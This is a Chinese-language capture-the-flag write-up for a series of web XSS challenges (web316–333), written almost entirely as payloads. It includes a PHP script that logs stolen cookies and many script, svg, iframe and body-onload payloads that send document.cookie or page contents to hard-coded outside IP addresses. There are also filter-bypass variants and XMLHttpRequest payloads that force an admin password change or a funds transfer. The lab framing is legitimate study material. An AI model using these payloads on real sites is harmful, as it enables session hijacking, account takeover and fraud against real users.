web316-320 各种基础姿势和绕过
# a.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
vps http://101.42.23.134/
-------------------------
<script>
var img=document.createElement("img"); img.src="http://101.42.23.134/a.php?cookie="+document.cookie;
</script>
-------------------------
<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
-------------------------
<script>window.location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<script>location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<input onfocus="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)" autofocus>
-------------------------
<svg onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
-------------------------
<iframe onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>
--------------------------
<body onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
web321 -322过滤了空格
<iframe/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>
web323
<body/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
web324-325
<body/**/onload="window.open('http://101.42.23.134/a.php?cookie='+document.cookie)">
web328
<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
在这个界面把x到的cookie打过去。
通过注册一个没有过滤密码的用户,进行了js执行,然后冒充管理员,进行获取flag
web329
在下面这个界面,把下面js代码打过去
<script>window.open('http://101.42.23.134/a.php?cookie='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
web330
用户名注册,强迫管理员修改账号和密码,在用户名那里X
<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>
用管理员登录,admin
web331
登录方式编程POST,注册方式也发生改变
<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/change.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('p=123456');</script>
用admin登录
web332
给admin 转账-10000
web333
两种方法
<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/amount.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('u=123&a=10000');</script>
-----------------------
自己给自己转账,指数增长,不得超过当前余额,预计15次左右即可